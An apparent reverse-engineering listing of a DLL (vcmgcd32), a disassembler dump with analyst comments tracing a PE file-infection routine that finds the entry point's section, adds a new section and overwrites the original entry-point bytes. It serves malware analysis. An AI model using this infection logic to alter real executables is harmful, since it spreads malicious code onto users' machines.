1000229C . 833D 38900010>CMP DWORD PTR DS:[10009038],0 ; GetOEP
100022A3 . 0F84 1B080000 JE vcmgcd32.10002AC4
100022A9 . 8B15 48900010 MOV EDX,DWORD PTR DS:[10009048] ; ?? GetSectionAlignment or OEP file offset
100022AF . 52 PUSH EDX ; /Arg2 => 00000000
100022B0 . 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; |
100022B3 . 50 PUSH EAX ; |Arg1
100022B4 . E8 B7FAFFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100022B9 . 83C4 08 ADD ESP,8
100022BC . 8945 CC MOV DWORD PTR SS:[EBP-34],EAX
100022BF . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100022C9 . EB 0F JMP SHORT vcmgcd32.100022DA
100022CB > 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100022D1 . 83C1 01 ADD ECX,1
100022D4 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
100022DA > 33D2 XOR EDX,EDX
100022DC . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; GetNumberOfSections
100022E3 . 83EA 01 SUB EDX,1 ; sectionNum - 1
100022E6 . 3995 14FFFFFF CMP DWORD PTR SS:[EBP-EC],EDX
100022EC . 0F87 03010000 JA vcmgcd32.100023F5 ; > sectionNo then jmp
100022F2 . 6A 28 PUSH 28
100022F4 . 33C0 XOR EAX,EAX
100022F6 . 66:A1 2490001>MOV AX,WORD PTR DS:[10009024] ; sizeofOptionHeader
100022FC . 8B8D 0CFFFFFF MOV ECX,DWORD PTR SS:[EBP-F4]
10002302 . 03C8 ADD ECX,EAX
10002304 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
1000230A . 6BD2 28 IMUL EDX,EDX,28
1000230D . 0315 94E60010 ADD EDX,DWORD PTR DS:[1000E694]
10002313 . 8D440A 18 LEA EAX,DWORD PTR DS:[EDX+ECX+18] ; GetSectionNameOffset
10002317 . 50 PUSH EAX
10002318 . 68 30E20010 PUSH vcmgcd32.1000E230
1000231D . E8 7E240000 CALL vcmgcd32.100047A0
10002322 . 83C4 0C ADD ESP,0C
10002325 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],1
1000232C . 75 10 JNZ SHORT vcmgcd32.1000233E
1000232E . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002333 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |String1 = vcmgcd32.1000E270
10002338 . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
1000233E > 8B0D 38900010 MOV ECX,DWORD PTR DS:[10009038]
10002344 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
1000234A . 72 5E JB SHORT vcmgcd32.100023AA
1000234C . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C] ; v.Offset
10002352 . 0315 38E20010 ADD EDX,DWORD PTR DS:[1000E238] ; v.Size
10002358 . 3915 38900010 CMP DWORD PTR DS:[10009038],EDX
1000235E . 73 4A JNB SHORT vcmgcd32.100023AA
10002360 . 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002367 . 74 41 JE SHORT vcmgcd32.100023AA
10002369 . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002370 . 74 38 JE SHORT vcmgcd32.100023AA
10002372 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
10002377 . 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX
1000237D . 8B0D 44E20010 MOV ECX,DWORD PTR DS:[1000E244]
10002383 . 898D 18FFFFFF MOV DWORD PTR SS:[EBP-E8],ECX
10002389 . 8B15 38900010 MOV EDX,DWORD PTR DS:[10009038]
1000238F . 2B15 3CE20010 SUB EDX,DWORD PTR DS:[1000E23C]
10002395 . 0315 44E20010 ADD EDX,DWORD PTR DS:[1000E244]
1000239B . 8955 AC MOV DWORD PTR SS:[EBP-54],EDX
1000239E . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023A4 . 8985 28FFFFFF MOV DWORD PTR SS:[EBP-D8],EAX
100023AA > 8B8D 08FFFFFF MOV ECX,DWORD PTR SS:[EBP-F8]
100023B0 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
100023B6 . 73 15 JNB SHORT vcmgcd32.100023CD
100023B8 . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C]
100023BE . 8995 08FFFFFF MOV DWORD PTR SS:[EBP-F8],EDX
100023C4 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023CA . 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
100023CD > 8B8D 2CFFFFFF MOV ECX,DWORD PTR SS:[EBP-D4]
100023D3 . 3B0D 44E20010 CMP ECX,DWORD PTR DS:[1000E244]
100023D9 . 73 15 JNB SHORT vcmgcd32.100023F0
100023DB . 8B15 44E20010 MOV EDX,DWORD PTR DS:[1000E244]
100023E1 . 8995 2CFFFFFF MOV DWORD PTR SS:[EBP-D4],EDX
100023E7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023ED . 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
100023F0 >^ E9 D6FEFFFF JMP vcmgcd32.100022CB ; find OEP's section, Get number of section
100023F5 > 6A 28 PUSH 28
100023F7 . 33C9 XOR ECX,ECX
100023F9 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024] ; SizeOfOptionHeader
10002400 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002406 . 03D1 ADD EDX,ECX
10002408 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000240B . 6BC0 28 IMUL EAX,EAX,28
1000240E . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002414 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002418 . 51 PUSH ECX
10002419 . 68 30E20010 PUSH vcmgcd32.1000E230
1000241E . E8 7D230000 CALL vcmgcd32.100047A0
10002423 . 83C4 0C ADD ESP,0C
10002426 . 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000242C . 52 PUSH EDX ; /Arg2 => 00000000
1000242D . A1 44E20010 MOV EAX,DWORD PTR DS:[1000E244] ; |
10002432 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240] ; |
10002438 . 50 PUSH EAX ; |Arg1
10002439 . E8 32F9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000243E . 83C4 08 ADD ESP,8
10002441 . 8945 C8 MOV DWORD PTR SS:[EBP-38],EAX
10002444 . C705 68900010>MOV DWORD PTR DS:[10009068],0
1000244E . 8B0D 48900010 MOV ECX,DWORD PTR DS:[10009048]
10002454 . 51 PUSH ECX ; /Arg2 => 00000000
10002455 . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34] ; |
10002458 . 0315 60900010 ADD EDX,DWORD PTR DS:[10009060] ; |
1000245E . 52 PUSH EDX ; |Arg1
1000245F . E8 0CF9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
10002464 . 83C4 08 ADD ESP,8
10002467 . A3 60900010 MOV DWORD PTR DS:[10009060],EAX
1000246C . A1 38900010 MOV EAX,DWORD PTR DS:[10009038]
10002471 . 2B85 24FFFFFF SUB EAX,DWORD PTR SS:[EBP-DC]
10002477 . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
1000247D . 8985 18FFFFFF MOV DWORD PTR SS:[EBP-E8],EAX
10002483 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002488 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |String1 = vcmgcd32.100090E8
1000248D . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
10002493 . 68 E8900010 PUSH vcmgcd32.100090E8 ; /StringOrChar = ""
10002498 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
1000249E . 833D 4CE20010>CMP DWORD PTR DS:[1000E24C],0
100024A5 . 0F85 19060000 JNZ vcmgcd32.10002AC4
100024AB . 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
100024AE . 030D 48900010 ADD ECX,DWORD PTR DS:[10009048]
100024B4 . 3B4D B8 CMP ECX,DWORD PTR SS:[EBP-48]
100024B7 . 0F86 07060000 JBE vcmgcd32.10002AC4
100024BD . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
100024C0 . 3B55 E0 CMP EDX,DWORD PTR SS:[EBP-20]
100024C3 . 0F85 FB050000 JNZ vcmgcd32.10002AC4
100024C9 . 813D 54E20010>CMP DWORD PTR DS:[1000E254],E0000020
100024D3 . 73 4B JNB SHORT vcmgcd32.10002520
100024D5 . A1 30610010 MOV EAX,DWORD PTR DS:[10006130]
100024DA . 50 PUSH EAX ; /Arg2 => 10006438 ASCII "TEXT"
100024DB . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024E0 . E8 DBECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024E5 . 83C4 08 ADD ESP,8
100024E8 . 85C0 TEST EAX,EAX
100024EA . 75 34 JNZ SHORT vcmgcd32.10002520
100024EC . 8B0D 34610010 MOV ECX,DWORD PTR DS:[10006134] ; vcmgcd32.10006440
100024F2 . 51 PUSH ECX ; /Arg2 => 10006440 ASCII "UPX"
100024F3 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024F8 . E8 C3ECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024FD . 83C4 08 ADD ESP,8
10002500 . 85C0 TEST EAX,EAX
10002502 . 75 1C JNZ SHORT vcmgcd32.10002520
10002504 . 8B15 38610010 MOV EDX,DWORD PTR DS:[10006138] ; vcmgcd32.10006448
1000250A . 52 PUSH EDX ; /Arg2 => 10006448 ASCII "CODE"
1000250B . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
10002510 . E8 ABECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
10002515 . 83C4 08 ADD ESP,8
10002518 . 85C0 TEST EAX,EAX
1000251A . 0F84 EF000000 JE vcmgcd32.1000260F
10002520 > 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002527 . 0F84 E2000000 JE vcmgcd32.1000260F
1000252D . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002534 . 0F84 D5000000 JE vcmgcd32.1000260F
1000253A . A1 40E20010 MOV EAX,DWORD PTR DS:[1000E240]
1000253F . 3B05 38E20010 CMP EAX,DWORD PTR DS:[1000E238]
10002545 . 72 17 JB SHORT vcmgcd32.1000255E
10002547 . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240]
1000254D . 2B0D 38E20010 SUB ECX,DWORD PTR DS:[1000E238]
10002553 . 034D CC ADD ECX,DWORD PTR SS:[EBP-34]
10002556 . 898D F8FEFFFF MOV DWORD PTR SS:[EBP-108],ECX
1000255C . EB 09 JMP SHORT vcmgcd32.10002567
1000255E > 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002561 . 8995 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EDX
10002567 > A1 38E20010 MOV EAX,DWORD PTR DS:[1000E238]
1000256C . 0385 F8FEFFFF ADD EAX,DWORD PTR SS:[EBP-108]
10002572 . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
10002577 . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C]
1000257D . 51 PUSH ECX ; /Arg2 => 00000000
1000257E . 8B15 40E20010 MOV EDX,DWORD PTR DS:[1000E240] ; |
10002584 . 0355 CC ADD EDX,DWORD PTR SS:[EBP-34] ; |
10002587 . 52 PUSH EDX ; |Arg1
10002588 . E8 E3F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000258D . 83C4 08 ADD ESP,8
10002590 . A3 40E20010 MOV DWORD PTR DS:[1000E240],EAX
10002595 . A1 48900010 MOV EAX,DWORD PTR DS:[10009048]
1000259A . 50 PUSH EAX ; /Arg2 => 00000000
1000259B . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240] ; |
100025A1 . 51 PUSH ECX ; |Arg1 => 00000000
100025A2 . E8 C9F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100025A7 . 83C4 08 ADD ESP,8
100025AA . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
100025AF . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
100025B9 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
100025C3 . 6A 28 PUSH 28
100025C5 . 68 30E20010 PUSH vcmgcd32.1000E230
100025CA . 33D2 XOR EDX,EDX
100025CC . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100025D3 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100025D9 . 03C2 ADD EAX,EDX
100025DB . 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]
100025DE . 6BC9 28 IMUL ECX,ECX,28
100025E1 . 030D 94E60010 ADD ECX,DWORD PTR DS:[1000E694]
100025E7 . 8D5401 18 LEA EDX,DWORD PTR DS:[ECX+EAX+18]
100025EB . 52 PUSH EDX
100025EC . E8 AF210000 CALL vcmgcd32.100047A0
100025F1 . 83C4 0C ADD ESP,0C
100025F4 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
100025F9 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240]
100025FF . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34]
10002602 . 2B05 38900010 SUB EAX,DWORD PTR DS:[10009038]
10002608 . 8945 C4 MOV DWORD PTR SS:[EBP-3C],EAX
1000260B . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000260F > 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]
10002612 . 81E1 FF000000 AND ECX,0FF
10002618 . 85C9 TEST ECX,ECX
1000261A . 0F85 45020000 JNZ vcmgcd32.10002865
10002620 . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; NumberOfSections
10002627 . 66:83C2 01 ADD DX,1 ; ++
1000262B . 66:8915 16900>MOV WORD PTR DS:[10009016],DX
10002632 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
1000263C . 833D E0900010>CMP DWORD PTR DS:[100090E0],0
10002643 . 74 4F JE SHORT vcmgcd32.10002694
10002645 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
1000264A . 50 PUSH EAX
1000264B . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002651 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
10002657 . 51 PUSH ECX
10002658 . 68 E8900010 PUSH vcmgcd32.100090E8
1000265D . E8 3E210000 CALL vcmgcd32.100047A0
10002662 . 83C4 0C ADD ESP,0C
10002665 . 8B15 E0900010 MOV EDX,DWORD PTR DS:[100090E0]
1000266B . 83C2 28 ADD EDX,28
1000266E . 8915 E0900010 MOV DWORD PTR DS:[100090E0],EDX
10002674 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
10002679 . 50 PUSH EAX
1000267A . 68 E8900010 PUSH vcmgcd32.100090E8
1000267F . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002685 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
1000268B . 51 PUSH ECX
1000268C . E8 0F210000 CALL vcmgcd32.100047A0
10002691 . 83C4 0C ADD ESP,0C
10002694 > 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
10002697 . 52 PUSH EDX ; /String
10002698 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
1000269E . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
100026A1 . 8D5401 FB LEA EDX,DWORD PTR DS:[ECX+EAX-5]
100026A5 . 52 PUSH EDX ; /StringOrChar
100026A6 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
100026AC . 0FBE05 70E200>MOVSX EAX,BYTE PTR DS:[1000E270]
100026B3 . 33C9 XOR ECX,ECX
100026B5 . 83F8 2E CMP EAX,2E
100026B8 . 0F94C1 SETE CL
100026BB . 81C1 70E20010 ADD ECX,vcmgcd32.1000E270
100026C1 . 51 PUSH ECX ; /<%s>
100026C2 . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
100026C5 . 52 PUSH EDX ; |/String
100026C6 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; |\lstrlenA
100026CC . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
100026CF . 0FBE5401 FB MOVSX EDX,BYTE PTR DS:[ECX+EAX-5] ; |
100026D4 . 52 PUSH EDX ; |<%c>
100026D5 . 68 A46A0010 PUSH vcmgcd32.10006AA4 ; |Format = ".%c%s"
100026DA . 68 30E20010 PUSH vcmgcd32.1000E230 ; |s = vcmgcd32.1000E230
100026DF . FF15 1C110010 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; \wsprintfA
100026E5 . 83C4 10 ADD ESP,10
100026E8 . 68 70E20010 PUSH vcmgcd32.1000E270 ; /String = ""
100026ED . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
100026F3 . 83F8 01 CMP EAX,1
100026F6 . 7E 30 JLE SHORT vcmgcd32.10002728
100026F8 . 0FBE05 72E200>MOVSX EAX,BYTE PTR DS:[1000E272]
100026FF . 83F8 60 CMP EAX,60
10002702 . 7E 19 JLE SHORT vcmgcd32.1000271D
10002704 . 0FBE0D 72E200>MOVSX ECX,BYTE PTR DS:[1000E272]
1000270B . 83F9 7B CMP ECX,7B
1000270E . 7D 0D JGE SHORT vcmgcd32.1000271D
10002710 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002715 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
1000271B . EB 0B JMP SHORT vcmgcd32.10002728
1000271D > 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002722 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
10002728 > 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000272E . 52 PUSH EDX ; /Arg2 => 00000000
1000272F . A1 60900010 MOV EAX,DWORD PTR DS:[10009060] ; |
10002734 . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34] ; |
10002737 . 50 PUSH EAX ; |Arg1
10002738 . E8 33F6FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000273D . 83C4 08 ADD ESP,8
10002740 . A3 3CE20010 MOV DWORD PTR DS:[1000E23C],EAX
10002745 . 8B4D CC MOV ECX,DWORD PTR SS:[EBP-34]
10002748 . 890D 38E20010 MOV DWORD PTR DS:[1000E238],ECX
1000274E . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002751 . 8915 40E20010 MOV DWORD PTR DS:[1000E240],EDX
10002757 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
1000275A . A3 44E20010 MOV DWORD PTR DS:[1000E244],EAX
1000275F . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
10002769 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
10002773 . 6A 28 PUSH 28
10002775 . 33C9 XOR ECX,ECX
10002777 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000277E . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002784 . 03D1 ADD EDX,ECX
10002786 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
10002789 . 83C0 01 ADD EAX,1
1000278C . 6BC0 28 IMUL EAX,EAX,28
1000278F . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002795 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002799 . 51 PUSH ECX
1000279A . 68 E8900010 PUSH vcmgcd32.100090E8
1000279F . E8 FC1F0000 CALL vcmgcd32.100047A0
100027A4 . 83C4 0C ADD ESP,0C
100027A7 . C745 C4 13000>MOV DWORD PTR SS:[EBP-3C],13
100027AE . 33D2 XOR EDX,EDX
100027B0 . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100027B7 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100027BD . 03C2 ADD EAX,EDX
100027BF . 33C9 XOR ECX,ECX
100027C1 . 66:8B0D 16900>MOV CX,WORD PTR DS:[10009016]
100027C8 . 6BC9 28 IMUL ECX,ECX,28
100027CB . 8B15 E4900010 MOV EDX,DWORD PTR DS:[100090E4]
100027D1 . 03D0 ADD EDX,EAX
100027D3 . 8D4411 18 LEA EAX,DWORD PTR DS:[ECX+EDX+18]
100027D7 . 3B05 64900010 CMP EAX,DWORD PTR DS:[10009064]
100027DD . 76 2D JBE SHORT vcmgcd32.1000280C
100027DF . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
100027E6 . EB 09 JMP SHORT vcmgcd32.100027F1
100027E8 > 8B4D C4 MOV ECX,DWORD PTR SS:[EBP-3C]
100027EB . 83C1 01 ADD ECX,1
100027EE . 894D C4 MOV DWORD PTR SS:[EBP-3C],ECX
100027F1 > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
100027F5 . 74 15 JE SHORT vcmgcd32.1000280C
100027F7 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
100027FA . 33C0 XOR EAX,EAX
100027FC . 66:8B0455 E89>MOV AX,WORD PTR DS:[EDX*2+100090E8]
10002804 . 85C0 TEST EAX,EAX
10002806 . 74 02 JE SHORT vcmgcd32.1000280A
10002808 . EB 02 JMP SHORT vcmgcd32.1000280C
1000280A >^ EB DC JMP SHORT vcmgcd32.100027E8
1000280C > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
10002810 . 75 4C JNZ SHORT vcmgcd32.1000285E
10002812 . 6A 28 PUSH 28
10002814 . 68 30E20010 PUSH vcmgcd32.1000E230
10002819 . 33C9 XOR ECX,ECX
1000281B . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
10002822 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002828 . 03D1 ADD EDX,ECX
1000282A . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000282D . 83C0 01 ADD EAX,1
10002830 . 6BC0 28 IMUL EAX,EAX,28
10002833 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002839 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
1000283D . 51 PUSH ECX
1000283E . E8 5D1F0000 CALL vcmgcd32.100047A0 ; add new section
10002843 . 83C4 0C ADD ESP,0C
10002846 . 8B15 60900010 MOV EDX,DWORD PTR DS:[10009060]
1000284C . 2B55 CC SUB EDX,DWORD PTR SS:[EBP-34]
1000284F . 2B15 38900010 SUB EDX,DWORD PTR DS:[10009038]
10002855 . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002858 . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000285C . EB 07 JMP SHORT vcmgcd32.10002865
1000285E > C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002865 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002868 . 25 FF000000 AND EAX,0FF
1000286D . 85C0 TEST EAX,EAX
1000286F . 0F84 4F020000 JE vcmgcd32.10002AC4
10002875 . 837D C4 00 CMP DWORD PTR SS:[EBP-3C],0
10002879 . 0F84 45020000 JE vcmgcd32.10002AC4
1000287F . 6A 28 PUSH 28
10002881 . 33C9 XOR ECX,ECX
10002883 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000288A . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002890 . 03D1 ADD EDX,ECX
10002892 . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
10002898 . 6BC0 28 IMUL EAX,EAX,28
1000289B . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028A1 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028A5 . 51 PUSH ECX
100028A6 . 68 30E20010 PUSH vcmgcd32.1000E230
100028AB . E8 F01E0000 CALL vcmgcd32.100047A0
100028B0 . 83C4 0C ADD ESP,0C
100028B3 . 8B15 54E20010 MOV EDX,DWORD PTR DS:[1000E254]
100028B9 . 81E2 00000080 AND EDX,80000000
100028BF . 85D2 TEST EDX,EDX
100028C1 . 75 43 JNZ SHORT vcmgcd32.10002906
100028C3 . A1 54E20010 MOV EAX,DWORD PTR DS:[1000E254]
100028C8 . 2D 00000080 SUB EAX,80000000
100028CD . A3 54E20010 MOV DWORD PTR DS:[1000E254],EAX
100028D2 . 6A 28 PUSH 28
100028D4 . 68 30E20010 PUSH vcmgcd32.1000E230
100028D9 . 33C9 XOR ECX,ECX
100028DB . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
100028E2 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
100028E8 . 03D1 ADD EDX,ECX
100028EA . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
100028F0 . 6BC0 28 IMUL EAX,EAX,28
100028F3 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028F9 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028FD . 51 PUSH ECX
100028FE . E8 9D1E0000 CALL vcmgcd32.100047A0
10002903 . 83C4 0C ADD ESP,0C
10002906 > 68 D8000000 PUSH 0D8
1000290B . 68 10900010 PUSH vcmgcd32.10009010
10002910 . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002916 . 0395 0CFFFFFF ADD EDX,DWORD PTR SS:[EBP-F4]
1000291C . 52 PUSH EDX
1000291D . E8 7E1E0000 CALL vcmgcd32.100047A0
10002922 . 83C4 0C ADD ESP,0C
10002925 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
10002928 . 0345 CC ADD EAX,DWORD PTR SS:[EBP-34]
1000292B . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
1000292E . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C] ; write new section data
10002934 . 51 PUSH ECX ; /Arg2 => 00000000
10002935 . 8B55 B0 MOV EDX,DWORD PTR SS:[EBP-50] ; |
10002938 . 52 PUSH EDX ; |Arg1
10002939 . E8 32F4FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000293E . 83C4 08 ADD ESP,8
10002941 . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
10002944 . 6A 01 PUSH 1 ; /Arg2 = 00000001
10002946 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
1000294B . E8 C0F5FFFF CALL vcmgcd32.10001F10 ; \vcmgcd32.10001F10
10002950 . 83C4 08 ADD ESP,8
10002953 . 6A 7B PUSH 7B ; save original OEP 7B bytes
10002955 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
1000295A . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
10002960 . 50 PUSH EAX
10002961 . 68 70E20010 PUSH vcmgcd32.1000E270
10002966 . E8 351E0000 CALL vcmgcd32.100047A0
/*
100047A0_fun(pDest, pSrc, dwLen);
*/
1000296B . 83C4 0C ADD ESP,0C
1000296E . 6A 7B PUSH 7B ; save to another mem
10002970 . 68 70E20010 PUSH vcmgcd32.1000E270
10002975 . 68 76960010 PUSH vcmgcd32.10009676
1000297A . E8 211E0000 CALL vcmgcd32.100047A0
1000297F . 83C4 0C ADD ESP,0C
10002982 . 6A 7B PUSH 7B ; write new 7B bytes overwrite OEP
10002984 . 8D8D 30FFFFFF LEA ECX,DWORD PTR SS:[EBP-D0]
1000298A . 51 PUSH ECX
1000298B . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002991 . 0395 18FFFFFF ADD EDX,DWORD PTR SS:[EBP-E8]
10002997 . 52 PUSH EDX
10002998 . E8 031E0000 CALL vcmgcd32.100047A0
1000299D . 83C4 0C ADD ESP,0C
100029A0 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100029AA . EB 0F JMP SHORT vcmgcd32.100029BB
100029AC > 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC] ; ???????? cf, D0 offset's data equal 11h
100029B2 . 83C0 01 ADD EAX,1
100029B5 . 8985 14FFFFFF MOV DWORD PTR SS:[EBP-EC],EAX
100029BB > 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],7C
100029C2 . 73 2A JNB SHORT vcmgcd32.100029EE
100029C4 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100029CA . 0FBE940D 30FF>MOVSX EDX,BYTE PTR SS:[EBP+ECX-D0]
100029D2 . 83FA 11 CMP EDX,11
100029D5 . 75 15 JNZ SHORT vcmgcd32.100029EC
100029D7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100029DD . 0FBE8C05 31FF>MOVSX ECX,BYTE PTR SS:[EBP+EAX-CF]
100029E5 . 83F9 11 CMP ECX,11
100029E8 . 75 02 JNZ SHORT vcmgcd32.100029EC
